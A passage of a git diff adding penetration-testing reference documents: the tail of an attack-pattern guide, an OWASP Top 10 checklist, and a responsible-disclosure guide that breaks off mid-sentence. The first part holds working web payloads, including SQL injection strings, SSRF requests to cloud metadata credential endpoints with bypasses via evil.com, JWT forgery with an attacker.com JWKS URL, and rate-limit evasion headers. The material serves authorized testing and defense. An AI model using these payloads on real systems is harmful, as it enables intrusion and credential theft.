SELECT NULL-- +' UNION SELECT NULL,NULL-- -- Match column count + +-- Step 2: Find displayable columns +' UNION SELECT 'a',NULL,NULL-- +' UNION SELECT NULL,'a',NULL-- + +-- Step 3: Extract database info +' UNION SELECT version(),NULL,NULL-- +' UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- +' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- +``` + +**Time-based blind injection:** +```sql +-- MySQL +' AND SLEEP(5)-- +' AND IF(1=1, SLEEP(5), 0)-- +' AND IF(SUBSTRING(version(),1,1)='5', SLEEP(5), 0)-- + +-- PostgreSQL +' AND pg_sleep(5)-- +'; SELECT pg_sleep(5)-- +' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)-- + +-- MSSQL +'; WAITFOR DELAY '0:0:5'-- +' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)-- +``` + +**Boolean-based blind injection:** +```sql +-- Extract data one character at a time +' AND SUBSTRING(username,1,1)='a'-- +' AND ASCII(SUBSTRING(username,1,1))>96-- +' AND ASCII(SUBSTRING(username,1,1))>109-- -- Binary search +``` + +### Database-Specific Syntax + +| Feature | MySQL | PostgreSQL | MSSQL | SQLite | +|---------|-------|------------|-------|--------| +| String concat | `CONCAT('a','b')` | `'a' \|\| 'b'` | `'a' + 'b'` | `'a' \|\| 'b'` | +| Comment | `-- ` or `#` | `--` | `--` | `--` | +| Version | `VERSION()` | `version()` | `@@version` | `sqlite_version()` | +| Current user | `CURRENT_USER()` | `current_user` | `SYSTEM_USER` | N/A | +| Sleep | `SLEEP(5)` | `pg_sleep(5)` | `WAITFOR DELAY '0:0:5'` | N/A | + +--- + +## SSRF Detection Techniques + +### Basic Payloads + +``` +http://127.0.0.1 +http://localhost +http://0.0.0.0 +http://[::1] -- IPv6 localhost +http://[0000::1] -- IPv6 localhost (expanded) +``` + +### Cloud Metadata Endpoints + +``` +# AWS EC2 Metadata (IMDSv1) +http://169.254.169.254/latest/meta-data/ +http://169.254.169.254/latest/meta-data/iam/security-credentials/ +http://169.254.169.254/latest/user-data + +# AWS EC2 Metadata (IMDSv2 — requires token header) +# Step 1: curl -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -X PUT http://169.254.169.254/latest/api/token +# Step 2: curl -H "X-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/ + +# GCP Metadata +http://metadata.google.internal/computeMetadata/v1/ +http://169.254.169.254/computeMetadata/v1/ + +# Azure Metadata +http://169.254.169.254/metadata/instance?api-version=2021-02-01 +http://169.254.169.254/metadata/identity/oauth2/token + +# DigitalOcean Metadata +http://169.254.169.254/metadata/v1/ +``` + +### Bypass Techniques + +**IP encoding tricks:** +``` +http://0x7f000001 -- Hex encoding of 127.0.0.1 +http://2130706433 -- Decimal encoding of 127.0.0.1 +http://0177.0.0.1 -- Octal encoding +http://127.1 -- Shortened +http://127.0.0.1.nip.io -- DNS rebinding via nip.io +``` + +**URL parsing inconsistencies:** +``` +http://127.0.0.1@evil.com -- URL authority confusion +http://evil.com#@127.0.0.1 -- Fragment confusion +http://127.0.0.1%00@evil.com -- Null byte injection +http://evil.com\@127.0.0.1 -- Backslash confusion +``` + +**Redirect chains:** +``` +# If the app follows redirects, find an open redirect first: +https://target.com/redirect?url=http://169.254.169.254/ +``` + +--- + +## JWT Manipulation Patterns + +### Decode Without Verification + +JWTs are Base64URL-encoded and can be decoded without the secret: +```bash +# Decode header +echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d +# Output: {"alg":"HS256"} + +# Decode payload +echo "eyJ1c2VyIjoiYWRtaW4ifQ" | base64 -d +# Output: {"user":"admin"} +``` + +### Algorithm Confusion Attacks + +**None algorithm attack:** +```json +// Original header +{"alg": "HS256", "typ": "JWT"} + +// Modified header — set algorithm to none +{"alg": "none", "typ": "JWT"} + +// Token format: header.payload. (empty signature) +``` + +**RS256 to HS256 confusion:** +If the server uses RS256 (asymmetric), try: +1. Get the server's RSA public key (from JWKS endpoint or TLS certificate) +2. Change `alg` to `HS256` +3. Sign the token using the RSA public key as the HMAC secret +4. If the server naively uses the configured key for both algorithms, it will verify the HMAC with the public key + +### Claim Manipulation + +```json +// Common claims to modify: +{ + "sub": "1234567890", // Change to another user's ID + "role": "admin", // Escalate from "user" to "admin" + "is_admin": true, // Toggle admin flag + "exp": 9999999999, // Extend expiration far into the future + "aud": "admin-api", // Change audience + "iss": "trusted-issuer" // Spoof issuer +} +``` + +### Weak Secret Brute Force + +Common JWT secrets to try (if you have a valid token to test against): +``` +secret +password +123456 +your-256-bit-secret +jwt_secret +changeme +mysecretkey +HS256-secret +``` + +Use tools like `jwt-cracker` or `hashcat -m 16500` for dictionary attacks. + +### JWKS Injection + +If the server fetches keys from a JWKS URL in the JWT header: +```json +{ + "alg": "RS256", + "jku": "https://attacker.com/.well-known/jwks.json" +} +``` +Host your own JWKS with a key pair you control. + +--- + +## API Authorization Testing (IDOR, BOLA) + +### IDOR Testing Methodology + +**Step 1: Identify resource identifiers** +Map all API endpoints and find parameters that reference resources: +``` +GET /api/users/{id}/profile +GET /api/orders/{orderId} +GET /api/documents/{docId}/download +PUT /api/users/{id}/settings +DELETE /api/comments/{commentId} +``` + +**Step 2: Create two test accounts** +- User A (attacker) and User B (victim) +- Authenticate as both and capture their tokens + +**Step 3: Cross-account access testing** +Using User A's token, request User B's resources: +``` +# Read +GET /api/users/{B_id}/profile → Should be 403 +GET /api/orders/{B_orderId} → Should be 403 + +# Write +PUT /api/users/{B_id}/settings → Should be 403 +PATCH /api/orders/{B_orderId} → Should be 403 + +# Delete +DELETE /api/comments/{B_commentId} → Should be 403 +``` + +**Step 4: ID manipulation** +``` +# Sequential IDs — increment/decrement +/api/users/100 → /api/users/101 + +# UUID prediction — not practical, but test for leaked UUIDs +# Check if UUIDs appear in other responses + +# Encoded IDs — decode and modify +/api/users/MTAw → base64 decode = "100" → encode "101" = MTAx + +# Hash-based IDs — check for predictable hashing +/api/users/md5(email) → compute md5 of known emails +``` + +### BFLA (Broken Function Level Authorization) + +Test access to administrative functions: +``` +# As regular user, try admin endpoints: +POST /api/admin/users → 403 +DELETE /api/admin/users/123 → 403 +PUT /api/admin/settings → 403 +GET /api/admin/reports → 403 +POST /api/admin/impersonate/user123 → 403 + +# Try HTTP method override: +GET /api/admin/users with X-HTTP-Method-Override: DELETE +POST /api/admin/users with _method=DELETE +``` + +### Mass Assignment Testing + +```json +// Normal user update request: +PUT /api/users/profile +{ + "name": "Normal User", + "email": "user@test.com" +} + +// Mass assignment attempt — add privileged fields: +PUT /api/users/profile +{ + "name": "Normal User", + "email": "user@test.com", + "role": "admin", + "is_verified": true, + "is_admin": true, + "balance": 99999, + "subscription": "enterprise", + "permissions": ["admin", "superadmin"] +} + +// Then check if any extra fields were persisted: +GET /api/users/profile +``` + +--- + +## GraphQL Security Testing Patterns + +### Introspection Query + +Use this to map the entire schema (should be disabled in production): +```graphql +{ + __schema { + queryType { name } + mutationType { name } + types { + name + kind + fields { + name + type { + name + kind + ofType { name kind } + } + args { name type { name } } + } + } + } +} +``` + +### Query Depth Attack + +Nested queries can cause exponential resource consumption: +```graphql +{ + users { + friends { + friends { + friends { + friends { + friends { + friends { + name + } + } + } + } + } + } + } +} +``` + +**Mitigation check:** Server should return an error like "Query depth exceeds maximum allowed depth." + +### Query Complexity Attack + +Wide queries with aliases: +```graphql +{ + a: users(limit: 1000) { name email } + b: users(limit: 1000) { name email } + c: users(limit: 1000) { name email } + d: users(limit: 1000) { name email } + e: users(limit: 1000) { name email } +} +``` + +### Batch Query Attack + +Send multiple operations in a single request to bypass rate limiting: +```json +[ + {"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"pass4\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"pass5\") { token } }"} +] +``` + +### Field Suggestion Exploitation + +GraphQL often suggests similar field names on typos: +```graphql +{ users { passwor } } +# Response: "Did you mean 'password'?" +``` + +Use this to discover hidden fields without full introspection. + +### Authorization Bypass via Fragments + +```graphql +query { + publicUser(id: 1) { + name + ...on User { + email # Should be restricted + ssn # Should be restricted + creditCard # Should be restricted + } + } +} +``` + +--- + +## Rate Limiting Bypass Techniques + +These techniques help verify that rate limiting is robust during authorized testing: + +``` +# IP rotation — test if rate limiting is per-IP only +X-Forwarded-For: 1.2.3.4 +X-Real-IP: 1.2.3.4 +X-Originating-IP: 1.2.3.4 + +# Case variation — test if endpoints are case-sensitive +/api/login +/API/LOGIN +/Api/Login + +# Path variation +/api/login +/api/login/ +/api/./login +/api/login?dummy=1 + +# HTTP method variation +POST /api/login +PUT /api/login + +# Unicode encoding +/api/logi%6E +``` + +If any of these bypass rate limiting, the implementation needs hardening. diff --git a/engineering-team/security-pen-testing/references/owasp_top_10_checklist.md b/engineering-team/security-pen-testing/references/owasp_top_10_checklist.md new file mode 100644 index 0000000..09de935 --- /dev/null +++ b/engineering-team/security-pen-testing/references/owasp_top_10_checklist.md @@ -0,0 +1,440 @@ +# OWASP Top 10 (2021) — Detailed Security Checklist + +Comprehensive reference for each OWASP Top 10 category with descriptions, test procedures, code patterns to detect, remediation steps, and CVSS scoring guidance. + +--- + +## A01:2021 — Broken Access Control + +**CWEs Covered:** CWE-200, CWE-201, CWE-352, CWE-639, CWE-862, CWE-863 + +### Description + +Access control enforces policy so users cannot act outside their intended permissions. Failures typically lead to unauthorized disclosure, modification, or destruction of data, or performing business functions outside the user's limits. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Horizontal privilege escalation | Change user ID in API requests (`/users/123` to `/users/124`) | 403 Forbidden | +| 2 | Vertical privilege escalation | Access admin endpoints with regular user token | 403 Forbidden | +| 3 | CORS validation | Send request with `Origin: https://evil.com` | `Access-Control-Allow-Origin` must not reflect arbitrary origins | +| 4 | Forced browsing | Request `/admin`, `/debug`, `/api/internal`, `/.env`, `/swagger.json` | 403 or 404 | +| 5 | Method-based bypass | Try POST instead of GET, or PUT instead of PATCH | Authorization checks apply regardless of HTTP method | +| 6 | JWT claim manipulation | Modify `role`, `is_admin`, `user_id` claims, re-sign with weak secret | 401 Unauthorized | +| 7 | Path traversal in authorization | Request `/api/users/../admin/settings` | Canonical path check must reject traversal | +| 8 | API endpoint enumeration | Fuzz API paths with wordlists | Only documented endpoints should respond | + +### Code Patterns to Detect + +```python +# BAD: No authorization check on resource access +@app.route("/api/documents/") +def get_document(doc_id): + return Document.query.get(doc_id).to_json() # No ownership check! + +# GOOD: Verify ownership +@app.route("/api/documents/") +@login_required +def get_document(doc_id): + doc = Document.query.get_or_404(doc_id) + if doc.owner_id != current_user.id: + abort(403) + return doc.to_json() +``` + +```javascript +// BAD: Client-side only access control +{isAdmin && } // Hidden but still accessible via API + +// GOOD: Server-side middleware +app.use('/admin/*', requireRole('admin')); +``` + +### Remediation + +1. Deny by default — require explicit authorization for every endpoint +2. Implement server-side access control, never rely on client-side checks +3. Use UUIDs instead of sequential IDs for resource identifiers +4. Log and alert on access control failures +5. Rate limit API requests to minimize automated enumeration +6. Disable CORS or restrict to specific trusted origins +7. Invalidate server-side sessions on logout + +### CVSS Scoring Guidance + +- **Horizontal escalation (read):** CVSS 6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N +- **Horizontal escalation (write):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N +- **Vertical escalation to admin:** CVSS 8.8 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H +- **Unauthenticated admin access:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + +--- + +## A02:2021 — Cryptographic Failures + +**CWEs Covered:** CWE-259, CWE-327, CWE-328, CWE-330, CWE-331 + +### Description + +Failures related to cryptography that often lead to sensitive data exposure. This includes using weak algorithms, improper key management, and transmitting data in cleartext. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | TLS version | `nmap --script ssl-enum-ciphers -p 443 target` | Only TLS 1.2+ accepted | +| 2 | Certificate validity | `openssl s_client -connect target:443` | Valid cert, not self-signed | +| 3 | HSTS header | Check response headers | `Strict-Transport-Security: max-age=31536000` | +| 4 | Password storage | Review auth code | bcrypt/scrypt/argon2 with cost >= 10 | +| 5 | Sensitive data in URLs | Review access logs | No tokens, passwords, or PII in query params | +| 6 | Encryption at rest | Check database/storage config | Sensitive fields encrypted (AES-256-GCM) | +| 7 | Key management | Review key storage | Keys in secrets manager, not in code/env files | +| 8 | Random number generation | Review token generation code | Uses crypto-grade PRNG (secrets module, crypto.randomBytes) | + +### Code Patterns to Detect + +```python +# BAD: MD5 for password hashing +password_hash = hashlib.md5(password.encode()).hexdigest() + +# BAD: Hardcoded encryption key +cipher = AES.new(b"mysecretkey12345", AES.MODE_GCM) + +# BAD: Weak random for tokens +token = str(random.randint(100000, 999999)) + +# GOOD: bcrypt for passwords +password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12)) + +# GOOD: Secrets module for tokens +token = secrets.token_urlsafe(32) +``` + +### Remediation + +1. Use TLS 1.2+ for all data in transit; redirect HTTP to HTTPS +2. Use bcrypt (cost 12+), scrypt, or argon2id for password hashing +3. Use AES-256-GCM for encryption at rest +4. Store keys in a secrets manager (Vault, AWS Secrets Manager, GCP Secret Manager) +5. Use `secrets` (Python) or `crypto.randomBytes` (Node.js) for token generation +6. Enable HSTS with preload +7. Never store sensitive data in URLs or logs + +### CVSS Scoring Guidance + +- **Cleartext transmission of passwords:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Weak password hashing (MD5):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Hardcoded encryption key:** CVSS 7.2 — AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + +--- + +## A03:2021 — Injection + +**CWEs Covered:** CWE-20, CWE-74, CWE-75, CWE-77, CWE-78, CWE-79, CWE-89 + +### Description + +Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. Includes SQL, NoSQL, OS command, LDAP, XPath, and template injection. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | SQL injection | Submit `' OR 1=1--` in input fields | No data leakage, proper error handling | +| 2 | Blind SQL injection | Submit `' AND SLEEP(5)--` | No 5-second delay in response | +| 3 | NoSQL injection | Submit `{"$gt":""}` in JSON fields | No data leakage | +| 4 | XSS (reflected) | Submit `` | Input is escaped/encoded in response | +| 5 | XSS (stored) | Submit payload in persistent fields | Payload is sanitized before storage | +| 6 | Command injection | Submit `; whoami` in fields | No command execution | +| 7 | Template injection | Submit `{{7*7}}` | No "49" in response | +| 8 | LDAP injection | Submit `*)(uid=*))(|(uid=*` | No directory enumeration | + +### Code Patterns to Detect + +```python +# BAD: String concatenation in SQL +cursor.execute("SELECT * FROM users WHERE email = '" + email + "'") +cursor.execute(f"SELECT * FROM users WHERE email = '{email}'") + +# GOOD: Parameterized query +cursor.execute("SELECT * FROM users WHERE email = %s", (email,)) +``` + +```javascript +// BAD: Template literal in SQL +db.query(`SELECT * FROM users WHERE id = ${userId}`); + +// GOOD: Parameterized query +db.query('SELECT * FROM users WHERE id = $1', [userId]); +``` + +### Remediation + +1. Use parameterized queries / prepared statements for ALL database operations +2. Use ORM methods with bound parameters (not raw queries) +3. Validate and sanitize all input on the server side +4. Use Content-Security-Policy to mitigate XSS impact +5. Escape output based on context (HTML, JS, URL, CSS) +6. Never pass user input to eval(), exec(), os.system(), or child_process +7. Use allowlists for expected input formats + +### CVSS Scoring Guidance + +- **SQL injection (unauthenticated):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +- **Stored XSS:** CVSS 7.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N +- **Reflected XSS:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +- **Command injection:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + +--- + +## A04:2021 — Insecure Design + +**CWEs Covered:** CWE-209, CWE-256, CWE-501, CWE-522 + +### Description + +Insecure design represents weaknesses in the design and architecture of the application, distinct from implementation bugs. This includes missing or ineffective security controls. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Rate limiting | Send 100 rapid requests to login | 429 after threshold (5-10 attempts) | +| 2 | Business logic abuse | Submit negative quantities, skip payment | All calculations server-side | +| 3 | Account lockout | 10+ failed login attempts | Account locked or CAPTCHA triggered | +| 4 | Multi-step flow bypass | Skip steps via direct URL access | Server validates state at each step | +| 5 | Password reset abuse | Request multiple reset tokens | Previous tokens invalidated | + +### Remediation + +1. Use threat modeling during design phase (STRIDE, PASTA) +2. Implement rate limiting on all sensitive endpoints +3. Validate business logic on the server, never trust client calculations +4. Use state machines for multi-step workflows +5. Implement CAPTCHA for public-facing forms after threshold + +### CVSS Scoring Guidance + +- **Missing rate limit on auth:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Business logic bypass (financial):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H + +--- + +## A05:2021 — Security Misconfiguration + +**CWEs Covered:** CWE-2, CWE-11, CWE-13, CWE-15, CWE-16, CWE-388 + +### Description + +The application is improperly configured, with default settings, unnecessary features enabled, verbose error messages, or missing security hardening. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Default credentials | Try admin:admin, root:root | Rejected | +| 2 | Debug mode | Trigger application errors | No stack traces in response | +| 3 | Security headers | Check response headers | CSP, X-Frame-Options, XCTO, HSTS present | +| 4 | HTTP methods | Send OPTIONS request | Only required methods allowed | +| 5 | Directory listing | Request directory without index | Listing disabled (403 or redirect) | +| 6 | Server version disclosure | Check Server and X-Powered-By headers | Version info removed | +| 7 | Error messages | Submit invalid data | Generic error messages, no internal details | + +### Remediation + +1. Disable debug mode in production +2. Remove default credentials and accounts +3. Add all security headers (CSP, HSTS, X-Frame-Options, XCTO, Referrer-Policy) +4. Remove Server and X-Powered-By headers +5. Disable directory listing +6. Implement generic error pages + +### CVSS Scoring Guidance + +- **Debug mode in production:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N +- **Default admin credentials:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +- **Missing security headers:** CVSS 4.3 — AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + +--- + +## A06:2021 — Vulnerable and Outdated Components + +**CWEs Covered:** CWE-1035, CWE-1104 + +### Description + +Components (libraries, frameworks, software modules) with known vulnerabilities that can undermine application defenses. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | npm audit | `npm audit --json` | No critical or high vulnerabilities | +| 2 | pip audit | `pip audit --desc` | No known CVEs | +| 3 | Go vulncheck | `govulncheck ./...` | No reachable vulnerabilities | +| 4 | EOL check | Compare framework versions to vendor EOL dates | No EOL components | +| 5 | License audit | Check dependency licenses | No copyleft licenses in proprietary code | + +### Remediation + +1. Run dependency audits in CI/CD (block merges on critical/high) +2. Set up automated dependency update PRs (Dependabot, Renovate) +3. Pin dependency versions in lock files +4. Remove unused dependencies +5. Subscribe to security advisories for key dependencies + +### CVSS Scoring Guidance + +Inherit the CVSS score from the upstream CVE. Add environmental metrics based on reachability. + +--- + +## A07:2021 — Identification and Authentication Failures + +**CWEs Covered:** CWE-255, CWE-259, CWE-287, CWE-288, CWE-384, CWE-798 + +### Description + +Weaknesses in authentication mechanisms that allow attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Brute force | 100 rapid login attempts | Account lockout or exponential backoff | +| 2 | Session cookie flags | Inspect cookies in browser | HttpOnly, Secure, SameSite set | +| 3 | Session invalidation | Logout, replay session cookie | 401 Unauthorized | +| 4 | Username enumeration | Submit valid/invalid usernames | Identical error messages | +| 5 | Password policy | Submit "12345" as password | Rejected (min 8 chars, complexity) | +| 6 | Password reset token | Request reset, check token expiry | Token expires in 15-60 minutes | +| 7 | MFA bypass | Skip MFA step via direct API call | Requires MFA completion | + +### Remediation + +1. Implement multi-factor authentication +2. Set session cookies with HttpOnly, Secure, SameSite=Strict +3. Invalidate sessions on logout and password change +4. Use generic error messages ("Invalid credentials" not "User not found") +5. Enforce strong password policy (NIST SP 800-63B) +6. Expire password reset tokens within 15-60 minutes + +### CVSS Scoring Guidance + +- **Authentication bypass:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +- **Session fixation:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Username enumeration:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + +--- + +## A08:2021 — Software and Data Integrity Failures + +**CWEs Covered:** CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-829 + +### Description + +Code and infrastructure that does not protect against integrity violations, including unsafe deserialization, unsigned updates, and CI/CD pipeline manipulation. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Unsafe deserialization | Send crafted serialized objects | Rejected or safely handled | +| 2 | SRI on CDN resources | Check script/link tags | Integrity attribute present | +| 3 | CI/CD pipeline | Review pipeline config | Signed commits, protected branches | +| 4 | Update integrity | Check update mechanism | Signed artifacts, hash verification | + +### Remediation + +1. Use `yaml.safe_load()` instead of `yaml.load()` +2. Avoid `pickle.loads()` on untrusted data +3. Add SRI hashes to all CDN-loaded scripts +4. Sign all deployment artifacts +5. Protect CI/CD pipeline with branch protection and signed commits + +### CVSS Scoring Guidance + +- **Unsafe deserialization (RCE):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +- **Missing SRI on CDN scripts:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + +--- + +## A09:2021 — Security Logging and Monitoring Failures + +**CWEs Covered:** CWE-117, CWE-223, CWE-532, CWE-778 + +### Description + +Without sufficient logging and monitoring, breaches cannot be detected. Logging too little means missed attacks; logging too much (sensitive data) creates new risks. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Auth event logging | Attempt valid/invalid logins | Both logged with timestamp and IP | +| 2 | Sensitive data in logs | Review log output | No passwords, tokens, PII, credit cards | +| 3 | Alert thresholds | Trigger 50 failed logins | Alert generated | +| 4 | Log integrity | Check log storage | Append-only or integrity-protected storage | +| 5 | Admin action audit trail | Perform admin actions | All actions logged with user identity | + +### Remediation + +1. Log all authentication events (success and failure) +2. Sanitize logs — strip passwords, tokens, PII before writing +3. Set up alerting on anomalous patterns (SIEM integration) +4. Use append-only log storage (CloudWatch, Splunk, immutable S3) +5. Maintain audit trail for all admin and data-modifying actions + +### CVSS Scoring Guidance + +Logging failures are typically scored as contributing factors rather than standalone vulnerabilities. When combined with other findings, they increase the overall risk level. + +--- + +## A10:2021 — Server-Side Request Forgery (SSRF) + +**CWEs Covered:** CWE-918 + +### Description + +SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL, allowing attackers to reach internal services, cloud metadata endpoints, or other protected resources. + +### Test Procedures + +| # | Test | Method | Expected Result | +|---|------|--------|-----------------| +| 1 | Internal IP access | Submit `http://127.0.0.1` in URL fields | Request blocked | +| 2 | Cloud metadata | Submit `http://169.254.169.254/latest/meta-data/` | Request blocked | +| 3 | IPv6 localhost | Submit `http://[::1]` | Request blocked | +| 4 | DNS rebinding | Use DNS rebinding service | Request blocked after resolution | +| 5 | URL encoding bypass | Submit `http://0x7f000001` (hex localhost) | Request blocked | +| 6 | Open redirect chain | Find open redirect, chain to internal URL | Request blocked | + +### Code Patterns to Detect + +```python +# BAD: User-controlled URL without validation +url = request.args.get("url") +response = requests.get(url) # SSRF! + +# GOOD: URL allowlist validation +ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"} +parsed = urlparse(url) +if parsed.hostname not in ALLOWED_HOSTS: + abort(403, "URL not in allowlist") +response = requests.get(url) +``` + +### Remediation + +1. Validate and allowlist outbound URLs (domain, scheme, port) +2. Block requests to private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x) +3. Block requests to cloud metadata endpoints +4. Use a dedicated egress proxy for outbound requests +5. Disable unnecessary URL-fetching features +6. Resolve DNS and validate the IP address before making the request + +### CVSS Scoring Guidance + +- **SSRF to cloud metadata (credential theft):** CVSS 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N +- **SSRF to internal service (read):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +- **Blind SSRF (no response data):** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N diff --git a/engineering-team/security-pen-testing/references/responsible_disclosure.md b/engineering-team/security-pen-testing/references/responsible_disclosure.md new file mode 100644 index 0000000..1088fb0 --- /dev/null +++ b/engineering-team/security-pen-testing/references/responsible_disclosure.md @@ -0,0 +1,317 @@ +# Responsible Disclosure Guide + +A complete guide for responsibly reporting security vulnerabilities found during authorized testing or independent security research. + +--- + +## Disclosure Timeline Templates + +### Standard 90-Day Disclosure + +The industry-standard timeline used by Google Project Zero, CERT/CC, and most security researchers. + +| Day | Action | Owner | +|-----|--------|-------| +| 0 | Discover vulnerability, document with evidence | Researcher | +| 1 | Submit initial report to vendor security contact | Researcher | +| 3 | Confirm report received (if no auto-acknowledgment) | Researcher | +| 7 | Follow up if no acknowledgment received | Researcher | +| 7 | Acknowledge receipt, assign tracking ID | Vendor | +| 14 | Provide initial severity assessment and timeline | Vendor | +| 30 | First status update on remediation progress | Vendor | +| 30 | Request update if none provided | Researcher | +| 60 | Second status update; fix should be in development | Vendor | +| 60 | Offer technical assistance if fix is delayed | Researcher | +| 90 | Public disclosure deadline (with or without fix) | Researcher | +| 90+ | Coordinate joint disclosure statement if fix is ready | Both | + +### Accelerated 30-Day Disclosure + +For actively exploited vulnerabilities or critical severity (CVSS 9.0+): + +| Day | Action | +|-----|--------| +| 0 | Discover, document, report immediately | +| 1 | Vendor acknowledges | +| 7 | Vendor provides remediation timeline | +| 14 | Status update; patch expected | +| 30 | Public disclosure | + +### Extended 120-Day Disclosure + +For complex vulnerabilities requiring architectural changes: + +| Day | Action | +|-----|--------| +| 0 | Report submitted | +| 14 | Vendor acknowledges, confirms complexity | +| 30 | Vendor provides detailed remediation plan | +| 60 | Status update, partial fix may be deployed | +| 90 | Near-complete remediation expected | +| 120 | Full disclosure | + +**When to extend:** Only if the vendor is actively working on a fix and communicating progress. A vendor that goes silent does not earn extra time. + +--- + +## Communication Templates + +### Initial Vulnerability Report + +``` +Subject: Security Vulnerability Report — [Brief Title] + +To: security@[vendor].com + +Dear Security Team, + +I am writing to report a security vulnerability I discovered in [Product/Service Name]. + +## Summary +- **Vulnerability Type:** [e.g., SQL Injection, SSRF, Authentication Bypass] +- **Severity:** [Critical/High/Medium/Low] (CVSS: X.X) +- **Affected Component:** [e.g., /api/login endpoint, User Profile page] +- **Discovery Date:** [YYYY-MM-DD] + +## Description +[Clear, technical description of the vulnerability — what it is, where it exists, and why it matters.] + +## Steps to Reproduce +1. [Step 1] +2. [Step 2] +3. [Step 3] + +## Evidence +[Screenshots, request/response pairs, or proof-of-concept code. Non-destructive only.] + +## Impact +[What an attacker could achieve by exploiting this vulnerability.] + +## Suggested Remediation +[Your recommendation for fixing the issue.] + +## Disclosure Timeline +I follow a [90-day] responsible disclosure policy. I plan to publicly disclose this finding on [DATE] unless we agree on an alternative timeline. + +## Researcher Information +- Name: [Your Name] +- Organization: [Your Organization, if applicable] +- Contact: [Your Email] +- PGP Key: [Fingerprint or link to public key] + +I have not accessed any user data, modified any systems, or shared this information with anyone else. I am happy to provide additional details or assist with remediation. + +Best regards, +[Your Name] +``` + +### Follow-Up (No Response After 7 Days) + +``` +Subject: Re: Security Vulnerability Report — [Brief Title] (Follow-Up) + +Dear Security Team, + +I am following up on the security vulnerability report I submitted on [DATE] regarding [Brief Title]. + +I have not yet received an acknowledgment. Could you please confirm receipt and provide an estimated timeline for review? + +For reference, my original report is included below / attached. + +I remain available to provide additional details or clarification. + +Best regards, +[Your Name] +``` + +### Status Update Request (Day 30) + +``` +Subject: Re: Security Vulnerability Report — [Brief Title] (30-Day Update Request) + +Dear Security Team, + +It has been 30 days since I reported the [vulnerability type] in [component]. I would appreciate an update on: + +1. Has the vulnerability been confirmed? +2. What is the remediation timeline? +3. Is there anything I can do to assist? + +As noted in my original report, I follow a 90-day disclosure policy. The current disclosure date is [DATE]. + +Best regards, +[Your Name] +``` + +### Pre-Disclosure Notification (Day 80) + +``` +Subject: Re: Security Vulnerability Report — [Brief Title] (Pre-Disclosure Notice) + +Dear Security Team, + +This is a courtesy notice that the 90-day disclosure window for [vulnerability] will close on [DATE]. + +Current status as I understand it: [summarize last known status]. + +If a fix is not yet available, I recommend: +- Publishing a security advisory acknowledging the issue +- Providing mitigation guidance to affected users +- Communicating a realistic remediation timeline + +I am willing to: +- Extend the deadline by [X] days if you can provide a concrete remediation date +- Review the patch before public release +- Coordinate joint disclosure + +Please respond by 